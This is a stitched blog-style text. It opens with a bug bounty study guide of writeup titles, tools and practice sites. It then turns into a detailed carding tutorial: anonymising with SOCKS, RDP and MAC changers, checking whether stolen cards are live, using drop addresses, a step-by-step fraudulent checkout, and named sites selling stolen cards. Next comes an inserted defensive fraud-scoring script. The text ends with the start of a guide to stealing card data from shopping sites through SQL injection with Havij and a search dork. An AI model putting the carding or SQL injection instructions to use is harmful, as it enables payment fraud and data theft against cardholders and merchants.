Hacking Facebook's Legacy API, Part 2: Stealing User Sessions by Stephen Sclafani
Delete FB Video
Delete FB Video
Facebook Page Takeover by Manipulating the Parameter by arunsureshkumar
Viewing private Airbnb Messages
IDOR tweet as any user by kedrisec
Classic IDOR endpoints in Twitter
Mass Assignment, Response to Request Injection, Admin Escalation by sean
Trello bug bounty: The websocket receives data when a public company creates a team visible board by Florian Courtial
Trello bug bounty: Payments informations are sent to the webhook when a team changes its visibility by Florian Courtial
Change any user's password in Uber by mongo
Vulnerability in Youtube allowed moving comments from any video to another by secgeek
Twitter Vulnerability Could Credit Cards from Any Twitter Account by secgeek
One Vulnerability allowed deleting comments of any user in all Yahoo sites by secgeek
Microsoft-careers.com Remote Password Reset by Yaaser Ali
How I could change your eBay password by Yaaser Ali
Duo Security Researchers Uncover Bypass of PayPal's Two-Factor Authentication by Duo Labs
Hacking Facebook.com/thanks Posting on behalf of your friends! by Anand Prakash
How I got access to millions of [redacted] accounts
All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description by Enguerran Gillier (opnsec)
Urgent: attacker can access every data source on Bime by Jobert Abma (jobert)
Downloading password protected / restricted videos on Vimeo by Gazza (gazza)
Get organization info based on uuid in Uber by Severus (severus)
How I Exposed your Primary Facebook Email Address (Bug worth $4500) by Roy Castillo

Unrestricted File Upload
As the name says, unrestricted file upload allows a user to upload a malicious file to a system, which can then be exploited further, for example for code execution.

References to read:

https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/unrestricted-file-upload/
https://www.owasp.org/index.php/Unrestricted_File_Upload
https://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation/

Some POCs:

File Upload XSS in image uploading of App in mopub by vijay kumar
RCE deal to tricky file upload by secgeek
File Upload XSS in image uploading of App in mopub in Twitter by vijay kumar (vijay_kumar1110)
Unrestricted File Upload to RCE by Muhammad Khizer Javed

XML External Entity Attack (XXE)
XXE is an attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

References to read:

https://portswigger.net/web-security/xxe
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
https://phonexicum.github.io/infosec/xxe.html

Some POCs:

XXE through SAML
XXE in Uber to read local files
XXE by SVG in community.lithium.com
How we got read access on Google's production servers by detectify
Blind OOB XXE At UBER 26+ Domains Hacked by Raghav Bisht

Local File Inclusion (LFI)
The File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

References to read:

https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/
https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

Some POCs:

SSRF to LFI
Disclosure Local File Inclusion by Symlink
Facebook Symlink Local File Inclusion
Gitlab Symlink Local File Inclusion
Gitlab Symlink Local File Inclusion Part II
Multiple Company LFI
LFI by video conversion, excited about this trick!

Subdomain Takeover
A process of registering a non-existing domain name to gain control over another domain.

References to read:

https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/
https://0xpatrik.com/subdomain-takeover-basics/
https://github.com/EdOverflow/can-i-take-over-xyz

Some POCs:

Hijacking tons of Instapage expired users Domains & Subdomains by geekboy
Reading Emails in Uber Subdomains
Slack Bug Journey – by David Vieira-Kurz
Subdomain takeover and chain it to perform authentication bypass by Arne Swinnen
UBER Wildcard Subdomain Takeover by Muhammad Khizer Javed
Lamborghini Subdomain Takeover Through Expired Cloudfront Distribution by Muhammad Khizer Javed
Subdomain Takeover via Unsecured S3 Bucket Connected to the Website by Muhammad Khizer Javed

Server Side Request Forgery (SSRF)
In SSRF, the attacker can abuse functionality on the server to read or update internal resources.

References to read:

https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-129d034c27978
https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/
https://blog.detectify.com/2019/01/10/what-is-server-side-request-forgery-ssrf/

Some POCs:

ESEA Server-Side Request Forgery and Querying AWS Meta Data by Brett Buerhaus
SSRF to pivot internal network
SSRF to LFI
SSRF to query google internal server
SSRF by using third party Open redirect by Brett BUERHAUS
SSRF tips from BugBountyHQ of Images
SSRF to RCE
XXE at Twitter
Blog post: Cracking the Lens: Targeting HTTP's Hidden Attack-Surface

Some Other Interesting POCs:
A huge collection at https://github.com/djadmin/awesome-bug-bounty

Deserialization

Java Deserialization in manager.paypal.com by Michael Stepankin
Instagram's Million Dollar Bug by Wesley Wineberg
Ruby Cookie Deserialization RCE on facebooksearch.algolia.com by Michiel Prins (michiel)
Java deserialization by meals

Race Condition

Race conditions on Facebook, DigitalOcean and others (fixed) by Josip Franjković
Race Conditions in Popular reports feature in HackerOne by Fábio Pires (shmoo)

Business Logic Flaw

Facebook simple technical hack to see the timeline by Ashish Padelkar
How I Could Steal Money from Instagram, Google and Microsoft by Arne Swinnen
How I could have removed all your Facebook notes
Facebook – bypass ads account's roles vulnerability 2015 by POUYA DARABI
Uber Ride for Free by anand praka
Uber Eat for Free by

Authentication Bypass

OneLogin authentication bypass on WordPress sites via XMLRPC in Uber by Jouko Pynnönen (jouko)
2FA PayPal Bypass by henryhoggard
SAML Bug in Github worth 15000
Authentication bypass on Airbnb via OAuth tokens theft
Uber Login CSRF + Open Redirect -> Account Takeover at Uber
Administrative Panel Access by c0rni3sm http://c0rni3sm.blogspot.hk/2017/08/accidentally-typo-to-bypass.html?m=1
Uber Bug Bounty: Gaining Access To An Internal Chat System by mishre
User Account Takeover via Signup by Muhammad Khizer Javed

HTTP Header Injection

Twitter Overflow Trilogy in Twitter by filedescriptor
Twitter CRLF by filedescriptor
Adblock Plus and (a little) more in Google
$10k host header by Ezequiel Pereira

Email Related

This domain is my domain – G Suite A record vulnerability
I got emails – G Suite Vulnerability
How I snooped into your private Slack messages [Slack Bug bounty worth $2,500]
Reading Uber's Internal Emails [Uber Bug Bounty report worth $10,000]
Slack Yammer Takeover by using TicketTrick by Inti De Ceukelaire
How I could have mass uploaded from every Flickr account!

Money Stealing

Round error issue -> produce money for free in Bitcoin Site by 4lemon

Others

Payment Flaw in Yahoo
Bypassing Google Email Domain Check to Deliver Spam Email on Google's Behalf
When Server Side Request Forgery combine with Cross Site Scripting
SAML Pen Test Good Paper
A list of FB writeup collected by phwd
NoSQL Injection by websecurify
CORS in action
CORS in Fb messenger
Web App Methodologies
XXE Cheatsheet
The road to hell is paved with SAML Assertions, Microsoft Vulnerability
Study this if you like to learn Mongo SQL Injection by cirw
Mongo DB Injection again by websecrify
w3af speech about modern vulnerability by w3af
Web cache attack that lead to account takeover
A talk to teach you how to use SAML Raider
XSS Checklist when you have no idea how to exploit the bug
CTF write up, Great for Bug Bounty
It turns out every site uses jquery mobile with Open Redirect is vulnerable to XSS by sirdarckcat
Bypass CSP by using google-analytics
Payment Issue with Paypal
Browser Exploitation in Chinese
XSS bypass filter
Markup Impropose Sanitization
Breaking XSS mitigations via Script Gadget
X41 Browser Security White Paper
Improper Input Validation | Add Custom Text and URLs In SMS send by Snapchat by Muhammad Khizer Javed
Exploiting Insecure Firebase Database! by Muhammad Khizer Javed
Using Inspect Element to Bypass Security restrictions by Muhammad Khizer Javed

Information Disclosure

Hacking SMS API Service Provider of a Company | Android App Static Security Analysis by Muhammad Khizer Javed
Vine User Private information disclosure
The feature works as intended, but what's in the source? by zseano
How Our Co-Founder Earned $10.6K in just 10 Hours by Tensecure Systems

So these were some common issues that one should get a grip on and keep learning about. Following is a list of attack topics that you should research and read blogs/reports on.

SQL Injection Attack
Hibernate Query Language Injection
Direct OS Code Injection
XML Entity Injection
Broken Authentication and Session Management
Cross-Site Scripting (XSS)
Insecure Direct Object References
Missing Function Level Access Control
Cross-Site Request Forgery (CSRF)
Using Components with Known Vulnerabilities
Unvalidated Redirects and Forwards
ClickJacking Attacks
DNS Cache Poisoning
Symlinking
Remote Code Execution Attacks
Remote File Inclusion
Local File Inclusion
Denial of Service Attack
PHPwn
NAT Pinning
XSHM
HTTP Parameter Pollution
Tabnabbing
LDAP Injection
Log Injection
Path Traversal
Reflected DOM Injection
Repudiation Attack
Resource Injection
Server-Side Includes (SSI) Injection
Session Fixation
Session Hijacking Attack
Session Prediction
Setting Manipulation
Special Element Injection
SMTP Injection
Traffic Flood
XPATH Injection

BLOGS! You should read.
Let's get to blogs! There are plenty of blogs shared by hackers on a daily basis that you can read to learn more and more.

https://blog.it-securityguard.com/
https://blog.innerht.ml/
http://brutelogic.com.br/blog/
https://klikki.fi/
http://philippeharewood.com/
https://seanmelia.wordpress.com/
https://respectxss.blogspot.com/
https://www.gracefulsecurity.com/
https://whitton.io/
https://tisiphone.net/
http://archive.nahamsec.com/
https://www.hackerscreed.org/
http://danlec.com/blog
https://wehackpeople.tumblr.com/
https://bitquark.co.uk/blog/
https://www.arneswinnen.net/
http://bugbountypoc.com/
https://medium.com/@arbazhussain/
http://www.shawarkhan.com/
https://blog.detectify.com/
http://www.rafayhackingarticles.net
https://forum.bugcrowd.com/
https://securitywall.co/
https://www.hackerone.com/blog
http://www.securitytube.net/
https://hackasia.org/
http://www.gangte.net/
https://mukarramkhalid.com/
https://securitytraning.com/
https://jubaeralnaziwhitehat.wordpress.com
http://hackaday.com/
http://www.securityfocus.com/
https://packetstormsecurity.com/
http://www.blackhat.com/
https://www.metasploit.com/
http://sectools.org/
https://labs.detectify.com/
https://blog.rubidus.com/
http://www.securityidiots.com/
https://hackernoon.com/
https://sqli-basic.blogspot.com/
https://bugbaba.blogspot.in/
https://vulnerability-lab.com/
https://medium.com/@know.0nix/
https://medium.com/@codingkarma/

These are some of the websites that I like to visit regularly to stay updated and read their articles.

Another piece of advice: regularly follow http://h1.nobbd.de/ to stay updated with HackerOne public bug reports. You can learn a lot from them. Alternatively, you can join a Slack community for hackers:

https://bugbounty-world.slack.com/
https://bugbountyforum.com/

Tools! You should try out.

dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
nmap https://nmap.org
masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
Playing with JSON Web Tokens for Fun and Profit
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuite https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass

This was as much as I can think of sharing with you regarding web app security tools and vulnerabilities. I have added a few things about mobile apps, but the following section contains some references you should definitely go through if you are going to join the mobile app security gang as well.

Mobile Application Security

So hello to the Mobile App Security section. Let me clear this up first: I'm a complete noob in this area, so it won't be as detailed as the web app one. The best and very first thing I would suggest is to actually learn about the development phase of an app; my focus is mainly Android apps (this doesn't necessarily mean you should learn to develop an Android app, but at least get to know the basics). For this, you can go through the following Android app development tools (my suggestion is that you should actually give basic time to these):

Android SDK ~ The Android software development kit (SDK) includes a comprehensive set of development tools. These include a debugger, libraries, a handset emulator based on QEMU, documentation, sample code, and tutorials.

ADT Bundle ~ The Android Developer Tools (ADT) bundle is a single download that contains everything developers need to start creating Android applications.

Root Tools ~ RootTools provides rooted developers with a standardized set of tools for use in the development of rooted applications.

Now, if you have gone through them, let's get towards mobile app security vulnerabilities. For this, I'll suggest you first go through the OWASP Mobile Top 10; giving them a good overview will definitely be worth it. I'll also highly suggest these two books specifically for Android & iOS app testing:

The Mobile Application Hacker's Handbook
iOS Application Security: The Definitive Guide for Hackers and Developers

For mobile applications, I'll share two of the best places I'm currently following to learn, and I would highly recommend you have a look at them; giving them a proper read will definitely help you.

Application Security Wiki: Application Security Wiki is an initiative to provide all application security-related resources to security researchers and developers in one place.
https://appsecwiki.com/

Learn iOS Security:
iOS Security Guide to learn and test by Prateek http://damnvulnerableiosapp.com/#learn

owasp-workshop-android-pentest:
Learning Penetration Testing of Android Applications

Mobile Application Penetration Testing Cheat Sheets:
The Mobile App Pentest cheat sheet
Mobile penetration testing android command cheatsheet
Getting Started in Android Apps Pen-testing

Summing up Phase #02 of this section: I think by following these resources and giving them good time, one can get pretty good at bug hunting. Here are some websites or places where you can play CTF challenges and practice the skills that you have learned.

Hacker 101 https://ctf.hacker101.com/
Hack the box https://www.hackthebox.eu/
OvertheWire wargames http://overthewire.org/wargames/
Pwnable.tw https://pwnable.tw/
Vulnhub https://www.vulnhub.com/
Troy Hunt "Hack Yourself First" https://hack-yourself-first.com/
Hack.Me https://hack.me/
Hacksplaining https://www.hacksplaining.com/lessons
Penetration Testing Practice Labs https://www.amanhardikar.com/mindmaps/Practice.html

I hope the path guide I'm trying to share here clears doubts for many newcomers in Bug Bounty Hunting. Let's move to Phase #03.

PHASE #03

Phase 03 is all about selecting a target, getting started with testing, and, after finishing testing, writing a good report about the issue you have found. So now, the final phase I have in mind is for people who have gone through all the good, important stuff and are now testing, so I'd like to give my advice about a few things and then sum up this blog.

Selecting and Approaching a Target?

One of the most important things in bug bounty hunting is to select a target that you're going to test. This basically depends on one's mood, experience, and skills: one can take a look at a target with a huge scope, having 4-5 websites with all subdomains in scope and a few mobile apps, and start testing them, or just one domain and one app with a lot of features to test. One can go to https://bugcrowd.com/programs or https://hackerone.com/directory and look for a program accordingly, or go to individual programs like Google, Facebook, or eBay.

Approaching a target to hunt is an easy task; you just need to be careful with what you're doing, and it all depends on you. For me, I usually do recon first by going through the domain history, links, IPs, and Wayback info of the site. Don't forget to keep notes of everything you do. After the basic recon process, for which I use tools and such (some things have to be done manually), I start hunting: I take a particular functionality/workflow in the application and start digging deep into it. I do look for low-hanging fruit or surface bugs; there is no point focusing your efforts on those, but keeping track of them is really helpful. I observe this workflow/requests via a proxy tool such as Burp or ZAP. Burp is actually the only tool I use for web or Android app pentesting. I mainly create multiple accounts because I want to test the functions being sent from one user to another. If you haven't been provided multiple accounts, ask for them.
To date, I have not been refused a second account whenever I have asked for it, or sometimes I create them easily myself. Just work with the app flow and keep testing; look for weird behaviours of the app and try changing things in them, but remember that finding an app working weirdly doesn't necessarily mean you have found a bug worth reporting. I would suggest you keep digging and try to actually find a basic security impact of it. Then I usually go for the major listed security vulnerabilities; I use the methods to achieve them, nothing much special, it all depends on the app (you can't find a PHP code injection in a static website lol), so that's why I usually give good time to learning the web flow. For this, I go on to reading API docs and such. After spending a few hours on this stuff, if I can't get anything on a particular point of the app, I usually stop and move on. Getting hung up on something is the biggest motivation killer, but that doesn't mean I give up; I do get back to it later if something else comes up. That's why I always make notes and save them for later use. That's basically all I do lol; it looks basic and easy, but for me it's hell time spent...

Reporting a Vulnerability?

So I'll say that after all this effort you have put into learning, practicing, and actually successfully finding a vulnerability, writing a report will be one of the most difficult tasks, because one mistake can annoy the team reviewing it or increase their workload. For me, writing a simple but effective report with proper headings and giving as many details as possible, with POC images or videos, can actually make your work fun and the team's work easy. To write a report I follow these guides:

WRITING SUCCESSFUL BUG SUBMISSIONS – BUG BOUNTY HUNTER METHODOLOGY
Writing a good and detailed vulnerability report
What does a good report look like?

Well, I guess this is where I'll end this section, and I hope the resources I'm sharing here help answer the questions I basically get in my DMs about teaching people. I myself am a learner right now, and learning is a huge part of my life; I consider myself a beginner, and sharing this is basically a way for me to learn more. As mentioned before, this guide is basically for people who are absolutely new or are still looking for a proper way to decide what to learn first and from where.

ENDING NOTE!

Being a security researcher, it is really tough to keep yourself up to date. I'd ask beginners to focus on self-study and learn things by themselves, as everything is possible; all you need is the passion to take a step, and after that you can achieve anything. Nothing is impossible to achieve. All I achieved was through self-study and self-motivation, without any certifications, and I'm still learning and trying my best to share what I can so others can also learn something. YOU ARE NEVER A PERFECT PERSON, BUT YOU ARE STILL BETTER THAN THE REST OF THE PEOPLE.

For a Bug Bounty Hunter & Cybersecurity Researcher, all it takes is the passion to achieve something.

MODULE 04: ALL ABOUT CARDING

If you were a victim of carding fraud or really want to understand what Carding and BIN are and how it is done, then here I have prepared the document which will clear up the basic understanding.

Points I cover:

What is carding?
What are the factors related to carding?
How is it done, I mean the process?
Precautionary measures a carder should take.

Overview:
Nowadays, if we look at the credit card fraud trend, it is increasing day by day, and new techniques are being discovered to hack credit card info and use it for malicious purposes. As everything goes cashless, the use of a credit card will be necessary for everyone. This is the reason people should be aware of how carding fraud is done and learn how not to become a victim. There are so many ways to get credit card details available on the internet through Darknet sites as well as on TOR sites (data leaks, etc.). My aim is to spread awareness about carding: what it is, how the carder does it, etc. I have referred to many articles, sites and basic documentation which I feel will be useful to share with you. I want the normal user to be aware of carding methods so they can be alert to it. As we can see on social media sites and groups, most of the carders provide offers; these are collected from online sites and groups for your reference. Be aware that you should never contact a ripper. A ripper is a fraudster who takes the money and never delivers the product.

(Screenshots: Offer on Facebook group; Offer on WhatsApp group)



LET’S START WITH THE BASICS

1. Introduction to Carding and Key Points: There are multiple definitions available, depending on the point of view. Carding itself is defined as the illegal use of a card (credit/debit) by unauthorized people (carders) to buy a product. For educational purposes, I will now show how a carder goes about their illicit activities. Remember: carding is highly illegal, and should not be attempted under any circumstances.

Key points in the carding method:

2. Let’s start to understand each point one by one.

Computer (PC): For carding, always use a computer. I know of some methods using a mobile device, but they are less secure and involve more risk.

SOCKS: SOCKS stands for Socket Secure. It is an internet protocol which allows client and server traffic to pass through a proxy server, so the real IP is hidden and the proxy IP is reflected instead. This is useful to carders because they want to appear to be at the credit card holder’s location. Users can buy SOCKS.

MAC Address Changer: MAC stands for Media Access Control. It is the unique address of every Network Interface Card (NIC). A MAC address changer allows you to change the MAC address of the NIC instantly. It is used to stay anonymous and safe.

CCleaner: It is a very useful tool that helps in cleaning your browsing history, cookies, temp files, etc. Many people ignore this part and get caught, so be careful and don’t forget to use it.

RDP (Remote Desktop Protocol): RDP allows one computer to connect to another computer over the network. It is a protocol developed by Microsoft. Basically, carders use it to connect to computers in the geographic location of the person whose credit card the carder wants to use. It is used for safety and to stay anonymous. Here carders use others’ PCs for carding instead of their own.

DROP: A DROP is an address which the carder uses as the shipping address in the carding process. Let me explain in detail with an example: if I am carding with a US credit card, then I use a USA address as the shipping address; then my order will be shipped successfully, and I will be safe. If you have relatives/friends there, then no problem; otherwise use sites who provide drop services, only you have to pay extra for shipping.

CC (Credit Card): This part is very important, so read it carefully. Any credit card is in the following format:

| Credit card Number | Exp Date | CVV2 code | Name on the Card | Address | City | State | Country | Zip code | Phone # (sometimes not included, depending on where you get your credit card from) |

e.g. (randomly taken number/details):

| 4305873969346315 | 05 | 2018 | 591 | UNITED STATES | John Mechanic | 201 | Stone Wayne Lane | Easternton | MA | 01949 |

TYPES OF CREDIT CARD

Every credit card company starts its credit card numbers with a unique digit to identify them individually, as shown below:

- American Express (AMEX Card) – 3xxxxxxxxxxxxxx
- Visa Card – 4xxxxxxxxxxxxxx
- MasterCard – 5xxxxxxxxxxxxxx
- Discover (Disco) – 6xxxxxxxxxxxxxx

Visa
1. Classic: The card is used worldwide in any location designated by Visa, including ATMs, real and virtual stores, and shops offering goods and services by mail and telephone.
2. Gold – This card has a higher limit capacity. The most used card, adopted worldwide.
3. Platinum – The card has limits over $10,000.
4. Signature – No preset spending limit; a great BIN to get.
5. Infinite – The most prestigious card, with virtually no limit. There are fewer in circulation, so be alert when buying these. Use only with reputable sellers!
6. Business – It can be used for small to medium-sized businesses; usually has a limit.
7. Corporate – It can be used with medium to large-size businesses, having a higher limit than a Business card.
8. Black – It has limited membership. It has no limit, only a $500 annual fee; a high-end card.

MasterCard
1. Standard – It is the same as the Visa Classic card.
2. Gold – It is the same as the Visa Gold card.
3. Platinum – It is the same as the Visa Platinum card.
4. World – It has a very high limit.
5. World Elite – It has virtually no limit; a high-end card.


Amex Card
1. Gold – It usually has around a 10k limit.
2. Platinum – It usually has a higher limit (around 35k).
3. Centurion – It has a high limit (75k+). It is also known as the black card; note: do not confuse it with the Visa Black card.

Now we can start with some questions and basic concepts before starting the practical process of carding.

Q1. What is a BIN?

It stands for Bank Identification Number (BIN). It is a 6-digit number, e.g. 431408. Some of the reference sites which give BIN info, which I also refer to:

- https://www.bincodes.com/bin-creditcard-generator/
- https://exactbins.com/bin-lookup/

Simply go to the site (https://www.bincodes.com/bin-creditcard-generator/), enter the BIN number and click on Find to get the details. I have added the first 6 digits only.

Q2. What is the meaning of VBV, NON VBV and MSC?

- VBV (Verified by Visa) – An extra level of protection added by Visa to protect the card from fraud, such as DOB, password, Social Security Number, mother’s name, etc., and also sending an OTP (one-time password) to the card owner’s mobile number as an extra security level to validate the transaction.
- NON VBV (not Verified by Visa) – Handy to use. No extra information, as specified for a VBV card, is needed while doing the transaction. Note it down (IMP): carders mainly buy and use NON VBV cards for carding.
- MSC (MasterCard SecureCode) – A security level the same as a VBV card.

Q3. What is AVS?

- It stands for Address Verification System.
- It is the system used to compare the credit card holder’s original address with the billing address provided by the user while shopping or doing an online transaction.
- The system is used to identify online fraud over the internet.


Q4. How to check whether a credit card is live or dead?

- There are many sites available on the internet to verify whether a credit card is live or dead, but they charge for it, approx. $0.001 (price may vary). Also, 80% of websites kill the credit card, so never use them.
- There are also tools available on the internet to check the credit card status, but most of them are a backdoor or Trojan, so prefer not to use them.
- As such there is no easy method to check it. Carders use their own ways to find it out. One of the ways is: most carders go to porn sites, buy a membership and confirm the credit card is live, then proceed with carding.

Q5. How to check whether the credit card is live or dead? (Skype method)

- Log into a Skype account and call the magic number +18005xx5633 (masked). You will connect to a voice mail (lady’s voice).
- Start by entering the credit card number, and the voice mail lady will stop automatically. After that, enter the expiry date of the card, like 01 16 (mm yy format).
- If your credit card is live, then the voice mail lady will say something like “Thank you for calling, we really appreciate your business, since you are a first-time caller we would like to connect you … blah blah”; then just hang up the call.
- But if the credit card is used and the voice mail lady says something like “Oh, I’m sorry, please re-enter your credit card number now”, then the card is dead.
- You can repeat the same process as many times as you want.

Note: You need a good internet connection for Skype calls.

Q6. What is Bill=Ship / Bill=CC / Ship=your address?

Kindly pay attention here, as it is also the main portion of the carding process. Any mistake will cancel the order and get the ID blocked.

- BILL=SHIP (Billing address = Shipping address): Take a normal online shopping scenario. When you are carding, the billing address and the shipping address you use are the same, meaning in both you use your own address. No need to use the credit card address.
- Bill=CC, Ship=your address: When you are carding, you use the credit card holder’s address as your billing address, and the shipping address will be your address. Most sites use this method.

Now we cleared basic concepts and start with the actual process of carding.

SETUP SOCKS PROXY IN FIREFOX

Follow the steps:
1. Open Firefox and go to Options, then Advanced, then Network.
2. A pop-up will come up. Select “Manual proxy configuration”.
3. Enter the SOCKS host and port, e.g. 127.0.0.1:8888.
4. Press OK and restart Firefox.
5. Now you are connected to secure SOCKS5.

Note: when you buy SOCKS, always match them with the credit card holder’s address. If the credit card holder is from California, USA, then try to get SOCKS5 at least matching the state and country.


CARDING PROCESS

Create an email ID matching the credit card holder’s name. If his name is John Cena (a random name), then the email ID should be [email protected] or near about.

1. Now run RDP and connect to a system at the credit card holder’s location to proceed. If you don’t have RDP, then follow the following steps.
2. Open the MAC changer and change the address randomly.
3. Run CCleaner and clean all the unwanted data (cookies/history/temp data etc.).
4. Set up the SOCKS5 proxy in Firefox.
5. Be sure the SOCKS5 matches the location of the credit card holder and be aware not to use a blacklisted IP. Check with http://www.check2ip.com.
6. Open the site for shopping. I recommend a shop website from your country, because then you don’t need to wait a long time for your package.
7. Register with the credit card holder’s information (John Cena): name, country, city, address, and email.
8. Shop, choose your item and add it to the cart. Precaution: select items not exceeding $500 in the first step.
9. In the shipping address add your address, or the drop address where the product is going to be delivered.
10. Then go to the payment page and choose a payment method such as credit card.
11. Enter all the credit card details manually, because most sites have a copy-paste detector script.
12. Finally, in the billing address add the credit card owner’s address info and then proceed with the payment process.
13. If everything is all right, then the order will be placed successfully.
14. Once the order arrives at the shipping address, receive it from the delivery boy.
15. (A few carders arrange a fake ID if the delivery boy asks for proof.)

Carding method using mobile: Extra-pro carders use a mobile for carding. If you followed the steps carefully, you can also do that. Basic requirements:

- A rooted Android mobile is required.
- Install the few applications required for carding (proxy apps, CCleaner, IMEI changer, photo and Android ID changer).
- You can use any VPN for carding; I recommend HMA or ZenMate.
- You can use a SOCKS5 proxy with the ProxyDroid app.
- Also proceed with the IMEI and Android ID changer and do it.
- Now connect ProxyDroid with the SOCKS5 proxy and connect.
- Now follow all the steps explained above.
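From the merchant’s side, the signals this process relies on (an order placed through a proxy exit, a BIN whose issuing country does not match the client IP, billing and shipping addresses that differ, a brand-new account placing a sizeable order, a pasted card number) are exactly what a fraud-screening rule set looks for. The following added example is not part of the original document; its BIN table, IP geolocation table, proxy list, weights, thresholds and sample orders are all constructed for illustration.

```python
"""Merchant-side fraud screening for the carding signals described above.
Added example: BIN table, IP table, proxy list, weights and cutoffs are constructed."""
from dataclasses import dataclass, field

# Constructed BIN (first 6 digits) -> issuing country; real deployments use a licensed BIN database.
BIN_COUNTRY = {"431408": "US", "540000": "GB"}
# Constructed IP -> country and known proxy/SOCKS exits (stand-in for a
# geolocation and proxy-reputation feed of the kind check2ip-style services expose).
IP_COUNTRY = {"198.51.100.7": "US", "203.0.113.9": "IN", "192.0.2.44": "US"}
KNOWN_PROXY_IPS = {"192.0.2.44"}

@dataclass
class Order:
    pan_first6: str
    ip: str
    billing_addr: str
    shipping_addr: str
    amount_usd: float
    account_age_days: int
    pasted_card_number: bool   # reported by the checkout page's paste detector

@dataclass
class Assessment:
    score: int = 0
    reasons: list = field(default_factory=list)

def assess(order: Order) -> Assessment:
    """Accumulate weighted risk points; each rule maps to one signal in the text."""
    a = Assessment()
    def hit(points: int, why: str) -> None:
        a.score += points
        a.reasons.append(why)
    bin_country = BIN_COUNTRY.get(order.pan_first6)
    ip_country = IP_COUNTRY.get(order.ip)
    if bin_country and ip_country and bin_country != ip_country:
        hit(40, "issuing country of BIN differs from IP country")
    if order.ip in KNOWN_PROXY_IPS:
        hit(30, "order placed through a known proxy/SOCKS exit")
    if order.billing_addr.strip().lower() != order.shipping_addr.strip().lower():
        hit(20, "billing and shipping addresses differ")
    if order.account_age_days < 1 and order.amount_usd >= 200:
        hit(20, "account created today placing a high-value order")
    if order.pasted_card_number:
        hit(10, "card number pasted instead of typed")
    return a

def decision(order: Order) -> str:
    """Map the score to approve / manual_review / decline (constructed cutoffs)."""
    score = assess(order).score
    if score >= 60:
        return "decline"
    if score >= 30:
        return "manual_review"
    return "approve"
```

Note that the order matching steps 5 to 9 above (location-matched SOCKS exit, fresh account, cardholder billing address, different shipping address) still accumulates 70 points, because the proxy, address and account-age rules fire independently of the country match.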

Reference sites:
- CC from shop – www.validcc.su
- Buy SOCKS from – www.vip72.com
- Download CCleaner software – www.piriform.com/ccleaner
- Download MAC address changer – www.zokali.com/win7-mac-addresschanger
- Download SOCKS checker – www.socksproxychecker.com

PERSONAL ADVICE: CARDING IS ILLEGAL ACTIVITY. DO NOT DO IT. IF GET CAUGHT, THEN, YOU WILL BE IN TROUBLE.



HOW TO GET FREE CREDIT CARDS USING HAVIJ

Are you searching for free credit cards for carding? Do you want to get a free live CC? If yes, then you are in the right place. The major problem in carding was the CC: people don’t have a CC to card with, or they don’t know a site where they can buy a CC. Today I am going to talk about how you can hack live CCs from shopping sites. Did I say from shopping sites? Yes, I did. Do you know that when anyone buys anything from a shopping site, he shares his private information with that site, like his credit card details, his DOB, etc.? Many of those shopping sites are vulnerable, meaning they are not protected enough to hide their clients’ details. So today we are using this weakness to hack CCs. Hope you get the basic idea of this tutorial.

REQUIREMENTS:
- Havij 1.16
- SQLi-DB [size=872kb]
- Carding Dorks [size=8kb]
- Vulnerable Sites

Let’s divide this tutorial into two parts: first, finding vulnerable sites, and second, getting data from these sites.

HOW TO FIND VULNERABLE SITES?

First we are going to find shopping sites, I mean vulnerable sites. To find vulnerable sites, you need to use SQLi-DB and the carding dorks. Let’s do it step by step.

Step 1. Copy one of the dorks (I am using inurl:/merchandise/index.php?cat=) and paste it into SQLi-DB.

Step 2. Set up the settings and click on the “Scan” button. This is not a high-level setting; it is simple: choose the search engine, and whether duplicate results should be removed or not. Set it yourself.


